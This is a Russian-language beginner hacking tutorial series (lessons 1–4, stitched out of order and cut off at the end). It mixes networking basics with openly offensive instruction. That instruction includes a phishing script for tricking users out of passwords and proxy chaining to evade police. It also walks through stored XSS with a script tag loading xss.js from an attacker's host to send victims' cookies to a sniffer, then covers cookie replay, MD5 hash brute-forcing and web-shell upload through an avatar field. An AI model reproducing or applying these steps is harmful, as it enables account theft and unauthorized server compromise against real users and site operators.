название переводится как "HyperText Markup Language" - "язык гипертекстовой разметки". Т.е. при помощи него не программируют,
а только "размечают" документ, показывая компьютеру, где какие данные должны быть. Как говорилось в предыдущем уроке, если
при написании сайта ограничиваться только этим языком, то мы просто задаём: здесь рисунок, а тут ссылка, а тут такой-то текст.
Таким образом, при каждой загрузке страницы мы увидим одно и то же: рисунок, ссылка, текст. А вот если прикрутить к документу
скрипт, написанный на PHP, мы можем указать, что при загрузке рисунка можно выбрать из базы данных, например, ту картинку, что
нравится пользователю. Таким образом, они друг друга дополняют. Ты должен чётко ощущать разницу между веб-дизайном и веб-программированием.

XML - это тоже язык гипертекстовой разметки, дающий большую гибкость, чем HTML, однако, его тебе пока учить не стоит.
WML - разномидность XML, используется для создания wap-сайтов.

PHP и Perl - наиболее часто используемые языки веб-программирования.

CSS - каскадные таблицы стилей. Это надстройка HTML, используется для визуального украшения документа - неподчёркнутые
ссылки, цвет полосы прокрутки, рамки, анимация, и многое-многое другое. Оригинальная версия этой статьи написана с
использованием css. Украшены ссылки, элементы списков, рамки для кода и правил, и др. Если ты читаешь статью с HackZona.ru,
то перед тобой не оригинальная статья, хотя это никак не отражается на сути урока.

Delphi, C++, C#, Java, Visual Basic, QBasic, Dark Basic, Pascal, Fortran, etc. - это "прикладные" языки. Приложения, созданные
в этих средах разработки, носят расширение *.exe . {+ хотя файлы php - тоже приложения +}
Kylix - это Delphi под Linux.
SQL - язык баз данных. Ты, наверное, слышал термин SQL injection? Мы к нему вернёмся через несколько уроков. Это уязвимость,
позволяющая хакеру вытаскивать данные из базы, передавая их вместе с PHP-запросом. И для этого нужно изучить SQL.

Ты сам понимаешь, что учить тебя этим языкам я не буду, я буду учить тебя их использовать. То, что тебя интересует, найдёшь
сам, посему, поехали дальше.

Существуют разные подвиды хакеров, занимающиеся разными видами деятельности:

Веб-хакинг

Крэкинг

Фрикинг

Социнженеринг/фишинг

Кардинг

От того, кем ты хочешь быть, зависит, что ты должен знать. Не существует единого компромисса, но на мой взгляд, лучше тебе
сейчас учиться на универсального хакера и изучать первые четыре варианта сразу. Лично я их и выбрал. Теперь опишу каждый из них:

Вэб-хакеры ищут уязвимости в веб-скриптах и изучают строение сайтов. Они, соответственно, изучают веб-языки.

Крэкеры (это не печенье;)) занимаются исследованием начинки программного обеспечения, в частности получение алгоритма
генерации серийного номера в платных программах, исп. для создания кейгенераторов. Для этого надо знать ассемблер, чтобы понимать, как устроена программа.

Фрикеров часто связывают с электроникой. Фрикер - любитель халявы, который привык не платить за услуги, связанные с электроникой. К этому относят взлом таксофонов, счетчиков, теликов, и т.д. и т.п.
Естественно, чтобы этим заниматься, нужно иметь глубокие познания в электронике. Мой папа по образованию - инженер-электронищик. Я 16 лет жил в одной квартире с
величайшим фрикером, не зная этого.

Социальная инженерия - это единственная наука из всех названных, направленная не на взлом компьютера, а на взлом человека.
Сейчас в Сети очень много ламмеров, и элементарно выманить их пароли оказывается достаточно просто. Например, выдать себя за
админа почтового сервиса, или тех. консультанта организации, и сказать, что мол поступила жалоба на спам с Вашего ящика, если
не хотите его удаления, отошлите такое-то письмо на почтовый робот такой-то, укажите свой логин, пароль, и этот код доступа:
46655529 (цифры наугад), и он поверит. Социнженеринг(далее СИ) применяется там, где единственное уязвимое место в системе -
пользователь. Пример: зачем ломать mail.ru если можно обмануть юзера?

Кардинг - манипуляции с кредитками, мардинг - маниакальное уничтожение взломанных систем. На этих пунктах мы останавливаться
не будем по понятным причинам.

Конечно, кое-кто раскритикует такое разделение, но новички должны знать эти понятия. Не бывает так, что хакер опытен только
в одном деле и безразличен к другим направлениям. Это деление чисто условное.

Кодинг - программирование с точки зрения хакерства.

Всё, ты уже стал на путь хакерства. Вводные уроки закончились, в следующий раз мы поговорим о более серьезных вещах. Я начну
рассказывать тебе о том, как устроен Интернет, какая в нем адресация, что такое IP,порты,proxy.

OffTopic

А в этом разделе я буду делать заметки к статьям, давать ссылки на ресурсы, и некоторую полезную информацию.
Так.. В статье упоминалось об "оригинальной версии". Фильтр HZ не позволяет в полной мере показать красоту статьи, поэтому
количество и оформление тегов приходится урезать для того, чтобы статья правильно отобразилась здесь. А те версии, которые
я творю изначально, можно просмотреть в галеерее Zero Byte. Кроме понятного
красивого оформления в них, там где надо, есть иллюстрации. Хотя в первых 2х уроках нет... Насчет оригиналов я повторяться
больше не буду.

Теперь такой вопрос: ShineShadow мне написал, что я многое упустил в первом уроке. И он почти полностью прав. Мне стыдно...
Мы это нагоним в будущем, по мере необходимости.

Безопасность хакера. Прокси.
[ Хакерство для новичков ]

Прокси подобны презервативу. Если оденешь - будет все чики-пуки. Будешь спешить со словами: «Да хрен с ним, успею вытянуть» - попадешь.
Теперь о главном. Посмотрим твой путь в Интернете. Комп-Сервер. Т.е. в этом случае палится твой ИП и время, потом через провайдера пробивается длина твоего... э... короче твоя личность. Рассмотрим другую схему Комп-Прокси-Сервер. Тут сервант палит ИП прокси, а он, в зависимости от его вида, решает сказать ли твой реальный ИП или нет.
Проще говоря, ты хапаешь порнуху на сам, а нагоняешь для этого прокси, который приносит тебе ее на блюдечке.
Официально прокси серверы используются для более быстрого серфинга инета. Например, ты с другом Васей любишь Бритни Спирс. Ее сайт находится на сервере какого-нибудь Парагвая, где инет дохлейший, а ты сидишь на диалапе. А прокси сервер находится в твоем городе. Таким образом, твой друг качает фотки Бритни через прокси, прокси сохраняет их (кэширует), а ты уже пытаясь скачать фотки с гнилого Парагвайского сайта, автоматически качаешь их с сервера прокси.
Но хакеры используют прокси с другой целью. Существуют два типа прокси: прозрачные и непрозрачные. Прозрачные отдадут логи (записи о тебе) интересующимся лицам и глазом не моргнут, а вот непрозрачные логов не пишут, твой ИП не палят, могут кстати и свой не палить))) Если встретишь названия анонимный или элитный - не пугайся - это те же непрозрачные яйца, только в профиль).
Прокси частенько падают от наплыва не желающих палиться хакеров и киддисов. Также проксики падают от рук дядек в погонах. Ищи на поисковиках, хотя чего душой кривить, найти хорошие бесплатные и быстрые прокси бывает трудновато. Я их беру с web-hack.ru. Там их немного, зато меняются каждые три часа.
Думаю, знаешь, где вписать прокси в браузере?
Теперь поговорим о том, как узнать, действительно ли прокси непрозрачные. Забиваем проксик в браузер и идем leader.ru/secure/who.html. Смотрим и сравниваем, что известно администратору о твоем компе. Если известно слишком много(твой реальный ИП), то откидываем проксик.
Теперь поговорим, о программных средства работы с прокси.
ProxyChecker - лучшая, на мой взгляд прога для определения анонимности прокси. Определяет скорость прокси и его расположение. Обязательно юзай ее!
A4Proxy - делает в принципе то же самое. Но она еще может составлять цепочки из прокси и разделять траффик. Тебя соответственно будет тяжелее спалить. Прикинь ментяры будут проверять каждый сервер из цепочки? Заколебутся!
Следующий шедевр - это SocksChain. Этот монстр сам скачивает списки прокси и сокс( сокс - это почти то же что и прокси, о нем в следующей статье) ты уже составляешь из них цепочки. Только не забудь прописать в настройках браузера 127.0.0.1!
Есть различные хакерские тулзы, для которых не прописано использование прокси. В этом случае ты используешь проги типа Freecap,ProxyCap и т.д., которые перенаправляют любой трафик через прокси.
Стоит отметить, что дядьки в погонах сами создают анонимные прокси и палят людей их использующих, поэтому только цепочки!
Лично я написал плакатик: «помни о прокси!» После того, как мне один раз ломаемый сервер не выдал строчку: «Ваш ИП и время были сохранены». Поэтому думай!

Вообще статья написана только для ознакомления. НЕ ПРИМЕНЯЙ НЕХОРОШИЕ ЗНАНИЯ НА ПРАКТИКЕ.



Основы хакерства. Урок 3
[ Хакерство для новичков ]

Основы хакерства. Урок 3
Основы

Сегодня мы поговорим о том, как устроен Интернет, об IP-сетях и адресации. Я не буду изобретать велосипед, в Сети очень много полезной информации по этой теме. Я приведу основные понятия, обьясню некоторые трудности. Итак, темы нашего сегодняшнего урока:

Что такое сети
Какие бывают сети
Сетевое оборудование
Адресация в сетях
порты, протоколы, OSI
ARPAnet aka Internet
Говоря о понятии СЕТЬ, надо сказать, что сети бывают разные, но принцип действия всех сетей один: Компьютерная сеть - это два и более компьютеров, логически связанных через канал связи - кабель, беспроводная связь. Я думаю, обьяснять это не надо, все это и так знают), поэтому расскажу лучше о типах сеток.

LAN (Local Area Network) - самые маленькие, локальные сети. Компьтеры таких сетей обычно расположены на небольшой территории, связаны между собой при помощи высокоскоростного кабеля, скоростью до 100МБит/сек. Их устанавливают в учебных заведениях, дома, и на небольших предприятиях.

WAN (Wide Area Network) - это так называемые "глобальные сети", такие, как Интернет. Компьютеры таких сетей могут находиться в разных уголках земного шара! Конечно, никто не будет прокладывать кабель на столь значительные растояния, поэтому WAN используют уже существующие линии связи, телефон, например. Естественно, от этого значительно падает скорость, но при таких расстояниях это единственно правильное решение.

MAN (Megapolis Area Network) - городские сети. Расслабься, у нас таких нет). Хотя я никогда их не видел, ... Это большая локальная сеть, чаще всего оптоволоконная, при подключении к которой у тебя есть и инет, и LAN на весь город. В Днепропетровске что-то подобное делает контора "Маша и медведь". Если интересно, посмотри тут, если нет - правильно)), поехали дальше.

Остановимся пока на небольших сетях, LAN. Давай углубимся в теорию и попытаемся понять, как это работает.
Наверняка ты уже видел эти сети, это их самый распространенный вид.

Топология сети - это вид связи ее компьютеров.
Полносвязная топология - это когда каждый компьютер при любых условиях связан со всеми остальными, работающими в данный момент, и выглядит это так

Топология "Кольцо" - в сетях с этой топологией данные передаются по кольцу от одного компьютера к другому, а компьютер, получая данные, проверяет, ему ли они адресованы, и если нет, передает их дальше, пока они не придут к отправителю.
Если в такую сеть поставить сниффер, то взломана будет вся сеть. Как думаешь, почему? Преимуществом такой топологии является то, что отправитель проверяет, пришли ли данные адресату. К минусам надо отнести то, что если хоть на одном компьютере сеть выходит из строя, ее работа нарушается. Также к минусам можно отнести загруженность канала при большом количестве машин. Посуди сам, если каждый юзер будет передавать инфу по сети одновременно, то в канале будут скапливаться данные со всех машин, и чем их больше, тем сеть медленнее. И рисунок

Общая шина. Наверняка ты не раз слышал об этой связи. Здесь все машины сети используют один и тот же сетевой кабель, имеющий Т-образные ответвления на каждый из компьютеров. Прелестью данной системы является то, что выход из строя какого-либо узла никак не отражается на работе остальных компьютеров, чего нельзя сказать о ячеистой(см. ниже) и кольцевой топологиях.Рисунок

Ячеистая топология. Компьютеры выходят в сеть друг через друга, цитируя один учебник, вычтите из полносвязной топологии некоторые связи и Вы получите ячеистую топологию. И, конечно, рисунок

Звезда. Здесь есть только два типа компьютеров - сервер и все остальные). Каждый компьютер подключен только к серверу, через который он и обменивается информацией с другими компьютерами, которые тоже связаны с этим сервером. Рисунок(сервер обозначен красной точкой)

Бывают и сложные, смешанные топологии. Они получаются тогда, когда несколько топологий перемешиваются в пределах одной боьшой сети. Например, в одном помещении ячеистая топология, в другом - беспроводная полносвязная сеть, и все они подключены к общему серверу.

При построении сети надо учитывать расстояние между компьютерами, удобства подводки кабеля, и исходя из обстоятельств, выбрать один из вышеперечисленных типов. Для общего развития советую вышесказанное знать. Возможно, это тебе пригодится, возможно, нет. Если ты столкнешься с проблемой взлома сети, надо же иметь представление, как она устроена, куда ставить сниффер, и всё такое. Я считаю, что нет нужды раздалбывать топологии дальше, поверхностных знаний тебе хватит.

Железо, используемое в сетях Редко когда большие сети состоят только из копьютеров, соединенных кабелем.

{
в процессе написания статьи я хрен знает сколько раз переписывал этот кусок, пытаясь попонятней обьяснить материал. За то, что в итоге получилось автор ответственности не несет))
}
Для того, чтобы сеть работала эффективно и при этом было понятно, как она это делает, в ней должна быть какая-то иерархия. Представь себе полносвязную сеть на 50 компьютеров)). Вопрос структуризации сети решают с помощью сетевого оборудования, о котором мы сейчас и поговорим.

Повторитель. При построении сети есть один особенный подводный камень - длина одного участка кабеля между соседними компьютерами не должна превышать 100 метров. Чтобы убрать это ограничение, и используются повторители. По сути, это обычный усилитель сигнала. Чтобы провести сеть в соседний дом, надо через каждые 90-100 метров ставить повторитель. Гланое его свойство - ловить сигнал на одном порту и, усиляя его, отражать на другой.

Рисунок

HUB. Хаб - это тот же повторитель, только у него не 2 гнезда, а несколько, что дает возможность обединять разные участки сети. То есть: Если на один из портов пришел сигнал, он будет отражен на все остальные.
А теперь перейдем к оборудованию, которое не обьединяет, а делит.

Мост разделяет сеть на участки, таким образом данные проходят через мост только если это действительно необходимо, т.е. если получатель не находится в одном сегменте с отправилелем.

Коммутатор отличется от моста только тем, что он имеет по процесору на каждое гнездо, в то время как у моста - один процесорный блок на все гнезда. Такая структура повышает производительность.

Маршрутизатор (aka свитч) - это тот же мост, но он, в отличие от моста, использует не аппаратные (типа 0081005е24а8), а составные, более осмысленные числовые адреса, что дает бОльшую гибкость при работе, т.к. явно видно, кому, куда и как.

Шлюз используется для обьединения сетей с разными типами программного и аппаратного обеспечения.
фууууг... Наконец-то. Нудно, но знать надо. А теперь поговорим о программной начинке этих самых сетей.

Адресация в сетях Адреса могут быть нескольких видов: числовые иерархические, как например 192.1.0.1. Такой адрес сожержит в себе информацию о подсети, немер компьютера в ней, что очень удобно в больших сетях, где оборудование сразу должно видеть, в какую подсеть отправлять данные, а там на месте уже разберется местное оборудование. Это позволяет избежать перегрузки канала, избавляет от необходимости искать адресата в общей сети. Вот почему они используются в Интернете.
Плоские - это адреса, которые не содержат в себе никакой иерархии, они более компактны, но медленне обрабатываются.
Аппаратный адрес - это строка в шестнадцатиричном или двоичном виде, которая вшивается в АО фирмой-изготовителем.
Символьный адрес - это тоже строка, но в отличие от аппаратного, она определяется программно.
Каждый компьютер в сети может иметь несколько адресов, например, если я ввожу у себя в LAN в командной строке 192.1.0.1, то я попадаю на комп BoDVa, если просто введу имя BoDVa, то попаду туда же.
За сопоставление имен и адресов в сети отвечает служба DNS (Domain Name Server). Теперь по порядку, как это происходит:

Я пишу в браузере имя сайта fssr.ru
Эта строка отправляется на DNS
DNS ищет в базе данных имя fssr.ru
Если находит, то
соединяет меня с хакзоной через IP, если нет -
обращается к DNS, стоящей в иерархии выше нее.
Вот так и работает Интернет. Его называют паутиной по двум причинам:
его структура и правда напоминает паутину
Страницы связаны между собой ссылками, типа нитями, составляющими вцелом паутину.

OSI, ISO ISO - International Standertization Organization - это организация, которая диктует стандарты, при чем ее влияние распространяется не только на компьютеры, но и на всё остальное. Посмотри снимательно на упаковку от сока и увидишь надпись: ISO 9001. Это стандарт качества. Если надписи ты не увидел, значит сок у тебя некачественный, пора переходить на пиво)).
OSI - Open Systems Interface, величайшее творение ISO. Это переводится как "интерфейс открытых систем", в соответствии с которым данные до начали передачи проходят по цепочке из семи уровней, на каждом из которых решаются свои проблемы своими способами. Эти уровни связаны между собой - каждый из них может общаться с соседними(ну типа который выше и который ниже него). При получении данные опять проходят по этой цепочке на другом компьютере, только снизу вверх. Вот как выглядит структура OSI

Давай отследим, как же твое письмо доходит до получателя:
Ты тыкаешь кнопку Отправить в Аутглюке. Это прикладной уровень.
Письмо кодируется и шифруется. Это представительный.
Письмо уходит на smtp-сервер, который контролирует отправку. Это сеансовый уровень.
Производится контроль за отправкой данных, чтобы не было утерь и нарушений (протокол TCP). Это транспортный.
Сетевой. Здесь обеспечивается передача данных между разными сетями.
Канальный. Идет передача внутри сети.
Физический. Передача электрических импульсов по кабелю.
Это всё очень сжато. Если интересует подробнее, посмотри соотв. литературу.

ARPAnet aka Internet Это последняя тема нашего сегодняшнего урока. Интернет представляет собой глобальную сеть, в которой обьединены ВСЕ сетевые технологии и способы передачи данных (спутники, телефонный кабель, Bluetooth, Wi-Fi, и т.д.). Существует сообщество w3c(www community), которое устанавливает правила, по которым работает Интернет. Есть дерево DNS, отвечающее за адресацию, и сервера, на которых они хранятся. Где - увы, не знаю. Сейчас многие не представляют своей жизни без этого, а между прочим, это разработка Министерства Обороны США. Изначально это разрабатывалось как внутренняя сеть Пентагона, но с возможностью доступа к ней откуда угодно. В связи с ростом популярности UNIX-систем (на которых Инет и держится), сеть ARPAnet была переименована в InterNet и получила всемирное распространение. Должен сказать, я восхищаюсь людьми, у которых хватило фантазии на создание такого грандиозного проекта, который себя оправдал.

[Offtopic]
Во-превых, хотелось бы отметить, что теперь оригинальные статьи дополняются авторскими иллюстрациями, и я рекомендую смотреть также оригиналы, т.к. в некоторых местах без них что-то может быть непонятно.

[FAQ]
Мне очень часто задают одни и те же вопросы, которыми зафлуживают мыло и аську, поэтому выношу наиболее частые, чтобы они не повторялись:
Q: Я прочитал урок 1/2/3, и т.д. Когда будут остальные? A: Я не могу похвастаться регулярностью написания статей, могу сказать только одно: они будут. Q: Ты можешь быть моим учителем? A: Жаль, но у меня нет времени на персональный подход. Читай уроки, задавай по ним вопросы. Q: Ну пожалуйста! A: ответ выше; Q: Я хочу сломать e-mail на мыло.ру. Как это сделать? A: Читай уроки, всё придет. Q: Научи меня пользоваться брутфорсом! A: Я лишь описал технологии взлома, а вот какие кнопки нажимать в программе - это должно быть и так понятно. ХакЗона, знай своих героев! На написание этой серии статей меня подтолкнули следующие юзеры:

BandBoy
don-daniil
Assambler
, за что им спасибо. На этом я ненадолго прервусь с уроками по уважительной причине. Всем желаю хорошо встретить Новый Год.

P.S. Если Вам понравились уроки серии "Основы хакерства", пожалуйста, поддержите автора, просто перейдя по этой ссылке

0

3

Основы хакерства. Урок 4
[ Хакерство для новичков ]

Основы

Привет, читатель! Вот мы и добрались до самого интересного. Сегодня мы поговорим о веб-хакинге, о том, кто, зачем, и какими способами взламывает сайты, какие бывают уязвимости, что такое сплойты, кто такие скрипт-кидди и почему лучше искать уязвимости самостоятельно, вручную. Темы урока:

Кто и зачем
Что такое уязвимости
Уязвимости класса XSS
Cookies. Вся правда
Исследование куков
Воруем куки
Что такое шелл
Заливаем шелл
Веб-хакинг - это самое популярное направление среди современных хакеров. Чаще всего под словом "хакинг" сейчас понимают взлом веб-сайтов. Делают это самыми разными способами. Давай сначала разберемся с терминами. Под словом "взлом" я понимаю (не)санкционированный доступ к ftp-аккаунту, базе данных. ftp - FILE TRANSFER PROTOCOL - протокол, предназначенный специально для передачи файлов. Это - один из старейших протоколов Интернет. При подключении на site.com по http мы видим браузером его главную страницу, при подключении по ftp мы увидим список файлов этого сайта. Другой вопрос, пустят нас или нет, т.к. в большинстве случаев для ftp нужен пароль. Как гласит подпись нашего главного админа, ВСЁ, ЧТО СОЗДАЛ ЧЕЛОВЕК, МОЖНО ВЗЛОМАТЬ. ИДЕАЛЬНОЙ ЗАЩИТЫ НЕ СУЩЕСТВУЕТ. И как ни крути, это правда. В Интернете очень много уязвимостей. Статистика показывает, что большинство динамических сайтов Интернета подвержены XSS и SQL injection. Хакеры ищут эти уязвимости и пытаются попасть внутрь. Но ведь бессмысленных взломов не бывает, верно? Т.е. лично я не ломаю каких-то левых сервисов, на которые зашел случайно, а выбираю себе совершенно конкретную цель, и тогда уже работаю над ней, пока не получу доступ. Многие пишут мне письма, и в конце добавляют - "только не ломай мою асю/мыло" или "только не закидывай мне вирус". Наивные)). Знаешь, почему? Правильно. Зачем мне троянить их компы, если мне это совершенно не надо?
Вывод: не занимайся неинтересными вещами. Вот если бы я прознал, что у него на компе лежит дамп БД ХакЗоны, я наверняка полез бы туда. Теперь цель очевидна - дамп. Из этого правила есть исключение - так называемый Google-хакинг. Представь себе такую обстановку: Каникулы, суббота, вечер, делать нечего, все знакомые тебя уже опасаются, рядом с компьютером наготовлена/недопита бутылка/банка пива/колы(нужное подчеркнуть( к цензору не относится;) ) ). Тогда твоя рука машинально тянется к ярлычку Inet.lnk, перед тобой возникает стартовая страница: Google. Ты вводишь запрос "filetype:dat inurl: Program Files", и перед тобой список бесплатных шестизначек)). Или пишешь "Powered by Invision Power Board 2.1.3" и запускаешь готовый сплойт от RST. Вот так иногда развлекаются ксакепы. Если смысл последних двух предложений остался тайной, покрытой мраком, ты прочитаешь об этом ниже.

Самый распространенный и популярный вид уязвимостей - это XSS. Смысл уязвимости заключается в том, что переменные, которые передаются какому-либо скрипту для последующей записи и вывода не фильтруются. Т.е. когда ты отписываешься в гостевой книге, кроме текста ты можешь писать любой HTML-тег, и он выполнится. Для наглядности я приготовил дырявую гостевую. Почему уязвимости XSS были, есть и будут проще всего понять, проанализировав файл записей вышеназванной гостебуки;)
http://powertray.t35.com/vlad-xss/guestbook.txt.
Зайди туда и в тексте напиши:

{a href="http://fssr.ru";}HackZona{/a}.
Как видишь, появилась ссылка. Это говорит о том, что выполнился HTML-код. Да, ссылка не несет никакой опасности, но ведь вместо тега {a} можно подставить тег {script}, и тогда мы получим в свое распоряжение всю мощь языка JavaScript. Давай разберемся, как при помощи этой уязвимости воруют cookies. Но сначала о том, что такое cookies.

[cookies] - это ВРЕМЕННЫЕ файлы, созданные сервером, которые хранятся на компьютере пользователя. В них содержится информация, такая как логин, пароль, хэш пароля, пользовательские настройки, и др. Использование кукисов освобождает пользователя от необходимости каждый раз при входе на аккаунт вводить пароль, например. Каждый сайт может создать у тебя на компьютере кукис, и вместо того, чтобы спрашивать у тебя логин/пароль просто считать их оттуда. В целях безопасности, сервер имеет доступ только к тем кукисам, которые создавал он, т.е. куки с других сайтов он читать не может.
Заметь, я выделил слово ВРЕМЕННЫЕ. Это означает, что они живут у тебя на машине только определенное время, после чего деактивируются. Дата, когда они становятся недействительными, тоже содержится в них, эта колонка называется EXPIRE DATE.

[Исследование куков]
Давай исследуем, какие же куки есть у тебя на компьютере.
В дальнейшем тебе по-любому для работы с куками IE понадобится программа IECookiesView, ссылки не имею, найдешь)).
Для расшифровки хэшей используй PasswordsPro, линк был в первом уроке.
Не прячь PasswordsPro далеко, т.к. в будущем она тебя будет реально выручать. В правильных руках это швейцарский нож для разделывания паролей.

[Исследование куков форума IPB]
Допустим, что я и мой товарищ зарегистрированы на некоем форуме wwwforum.zu на основе Invision Power Board версии 1.х. Мы имеем свежие куки нашего друга, утянутые, в моем случае с помощью ALB. Я открываю IEcookiesView, ищу наш форум. Вижу два поля: member_id: 23
pass_hash: b513f22c3db6932855ad732f5f8a10a2
Ну тут НЕ догадаться трудно:
member_id - порядковый номер пользователя (у главного админа он равен 0)
Я зарегистрировался 23м по счету.
pass_hash - md5-хэш моего пароля.
Рисунок
Дальше я копирую в папку с куками (C:Documents and SettingsVladUhaCookies) файл, утянутый у друга, предварительно заменив никнейм_френда@forum.zu на vladuha@forum.zu, так, чтобы он заменил мой старый. Открываю этот кук, и вижу следующее: member_id: 24
pass_hash: e10adc3949ba59abbe56e057f20f883e
Он зарегистрировался сразу после меня. Во-первых, я открываю Internet Explorer и захожу на wwwforum.zu Опа! Здрастте, "никнейм_френда"!
Ваш последний визит: дд.мм.гг Неплохо, но мало. Я хочу получить пароль, а не просто украсть сессию. Я открываю PasswordsPro, "восстановление паролей к хэшам", нажимаю "редактировать" на записи User, тип уже установлен - MD5. В поле "Хэш" вставляю затыренный хэш.
Рисунок
Не забудь о том, что надо тщательно выставить настройки атаки.
Скрестив пальцы, нажимаю "Начать атаку".
Пароль оказался простым и очень быстро подобрался. Это был 123456. Кстати, прежде чем брутить хэш, загляни сюда: если тип хэша MD5, возможно, тебе повезет и ты найдешь пароль по базе данных этого сайта. Если нет, придется брутить.
В IPB версий 2.х в колонке pass_hash находится не хэш пароля, а просто пропускной ключ, его сбрутить уже не получится. Теперь ты знаешь, что такое cookies, как их подменять, и что это дает. А теперь давай научимся их вытягивать, используя XSS. Для этого тебе нужен специальный набор скриптов, я советую использовать мой собственный: http://powertray.t35.com/snif.rar.
Теперь давай разберемся, как это работает. Открой xss.js в блокноте. Это скрипт, который ты должен умудриться внедрить на уязвимый форум. Когда он выполняется, он показывает невидимый iframe, следствием чего является передача куков снифферу xss.php, который должен быть расположен на хостинге с поддержкой PHP и правильно выставленными правами на запись(делается вручную). При вызове xss.php, он автоматически фиксирует время, IP-адрес жертвы в данный момент времени, откуда она пришла (REFERER), ну и записывает(добавляет) это всё, а также куки жертвы в файл snif.html. Отдельно я подошел к оформлению html-файла с результатами. Большинство куки-снифферов, которые я видел на форумах, написаны на скорую руку - неудобные, малофункциональные. Я решил внести в это дело немного стиля. Кстати, CSS-оформление я позаимствовал из веб-шелла команды АК-74, за что им спасибо(Привет Теллуру;)). В результатах при клике на IP откроется окно, которое расскажет тебе об этом адресе все, что знает)).
Итак, все эти файлы ты загружаешь на свою домашнюю страницу.
Как ты, наверное, уже догадался, xss.js должен ВЫПОЛНЯТЬСЯ на уязвимом форуме(чате, сайте ... )
Принцип работы сниффера понятен, следующий этап - проинклудить его в уязвимую страницу. С моей гостевой это не получится, там не используются куки. Куда это приткнуть ты уже найдешь сам. Делается это строчкой
{script language=javascript src=http://твой_сайт.zu/xss.js}
Кто-то просил примеров побольше... Ладно, вот пример: Есть некий форум site.com, и твоя страничка pupkin.ru
И вот представь себе, оказывается, форум на сайте самописный, а в таких случаях часто можно найти уязвимость. Ты долго по нему лазишь в надежде найти что-нибудь интересное, и находишь: аватар можно загрузить напрямую с твоего компьютера или вместо этого показывать его с какого-то адреса в Интернете. Причем разработчики не посчитали нужным проверять, действительно ли это картинка. Поле должно выглядеть примерно так:

URL вашей картинки: http://hacker.zu/xss.js
Ты нажимаешь кнопку "Сохранить" внизу страницы, заходишь на форум и видишь, что никакой на аватаре, естественно, нет. Вместо этого твои куки с форума перекочевали на сниффер. Идешь, проверяешь snif.html.
Что ты там увидишь - я предсказать не в силах, могу лишь посоветовать не обольщаться, ибо самописные форумы - это редкость, а если и есть, то они хорошо защищены. Если ты найдешь такой, можешь считать себя счастливчиком;).

[Разведение шеллов]
А теперь давай поговорим о шеллах. Веб-шелл в данном случае представляет собой php-файл, предназначенный для управления взломанным сервером. На данный момент я знаю не так много хороших шеллов, но могу посоветовать r57 или c99. Скачать увесистый набор веб-шеллов можно отсюда. Прямой ссылки не имею, поищи по форуму.
Рисунок
Шелл в действии

[Заливаем шелл]
Как ты понял, чтобы управлять (на самом деле управлять - громко сказано, это как получится) файловой системой взломанного ресурса, нужно закачать туда шелл. Делается это посредством нахождения соответствующей уязвимости. Здесь будь внимательным: файл шелла должен быть именно ЗАКАЧАН на уязвимый сайт, а не просто показан. Т.е. в предыдущем примере с форумом мы сможем залить шелл через аватар только в том случае, если форум автоматически закачивает указанный файл себе на винт, в противном случае мы увидим файловую систему того сервера, на котором шелл расположен изначально. А нам нужна ФС ФОРУМА. Кстати о предыдущем примере. Тут вроде бы все ясно: В поле рисунка вписываем путь к шеллу, на самом форуме кликаем по нашему "аватару" и смотрим, куда он залился. Вызываем браузером этот путь. Вроде все, дополнительно - список статей в оффтопике.

[Offtopic]
Как дополнительный материал советую прочитать:
XSS Новичкам. Автор: DrWeb
Теоретические основы хакинга. Автор: DrWeb
Взлом чатов by Algol. теория и практика(ищи на Античате)
Обход XSS-фильтров при использовании уязвимостей(ищи на Античате)
Введение в веб-хакинг высокого уровня. Автор: Trinux
Формат и синтаксис cookie

Теперь какое-то время специально уроков писать не буду, чтобы ты потренировался в том, что есть, т.к. дальше я буду рассказывать об эксплоитах, но я не хочу делать из тебя киддиса. Для размещения сниффера понадобится бесплатный хостинг с пхп, я могу посоветовать:
wwwfatal.ru
wwwjino-net.ru
wwwholm.ru
wwwt35.com (имхо самый лучший из них)

Если кому-то приглянулась моя гостевая, без XSS ее можно будет скачать с моей хоум паги, как только я закончу ее реконструкцию. Я думаю организовать бесплатную email-рассылку "основ хакерства". Преимущества очевидны:
поддержка стилей
поддержка картинок
самый быстрый способ получения статей
Могу найти в ней место под 1 баннер 648х60, ищу спонсора(uha90@mail.ru). Если Вам нравятся уроки серии "Основы хакерства", поддержите автора, перейдя по этой ссылке. Это даст мне пару центов по партнерской программе. Как только там соберется какая-то сумма денег, я переведу их на WM и оплачу Интернет.

ВЗЛОМ И ХАКЕР 

Основы хакерства. Урок 1 [ Хакерство для новичков ] В этом уроке будут рассмотрены следующие две темы: введение и инструменты хакера. Введение Привет, читатель. Год назад я пришёл на ХЗ, и очень хотел стать хакером. Никто не мог мне обьяснить многие простые вещи, я видел много опытных, но стать на путь хакера мне помогли буквально единицы. И я могу их назвать: PinkPanther, DrWeb, R_a_ID_e_R. Я обучался сам, не надеясь ни на чью помощь, стараясь описывать свои познания в статьях для новичков. Так шло время, менялись поколения... Я не хочу усложнять жизнь ньюбов, я всегда к ним хорошо относился, и я считаю, что новички меют право знать. Тот, кто скажет, что я неправ, что мол "пусть сами разбираются, только так они вырастут", и прав и неправ. Да, упорные достигнут своей цели, но человек, которому это не надо, просто не будет читать эту статью. Тем, кто до сих пор мучает поисковики вопросами типа "как стать хакером" я решил посвятить цикл уроков, а может, и книгу. Ты пройдёшь путь от ламмера до хакера, изучишь технологии программирования, взлома и многое-многое другое. Проходи этот путь по моим урокам, и всё будет ОК. Это первый урок, посвящённый азам хакерства, он скорее завлекающий. Помни, всё это только игрушки, а настоящее хакерство пойдёт потом. А на этом этапе ты должен решить, нужно оно тебе, или нет. Постепенно мы изучим сетевые технологии, ты узнаешь, как устроен Интернет, что можно в нём найти интересного, что можно, а что нельзя. Добро пожаловать в наш мир! Инструменты хакера В этом разделе я опишу джентльменский набор хакера. Этими инструментами мы будем иногда пользоваться в дальнейшем. - Брутфорс - Сканнер портов - Сканнер безопасности - Джойнер - Mail Bomber - Bзлом паролей Windows - Просмотр паролей - Троян - KeyLogger - Скрыватель IP (прокси/сокс) - Подмена HTTP-запросов Начнём по порядку: [Брутфорс]. Bruteforce (в переводе с английского "грубая сила") применяется для подбора паролей от e-mail и ftp-серверов. Существует много видов программ-брутфорсов, но их способности схожи. При использовании таких программ на dial-up соединениях, где скорость не превышает 56 Кбит/сек, подбор может длиться долго и нудно, при использовании же скоростного интернета (ADSL, оптоволокно, спутник, и т.д.) скорость подбора увеличивается, однако тогда сьедается немало траффика. Оптимальный вариант - подбор по словарю. Взломщик составляет текстовый документ из возможных паролей жертвы, программа подключается на заданный ей сервер и по очереди перебирает пароли из файла. Если производится подбор паролей к почтовому ящику, нужно указать 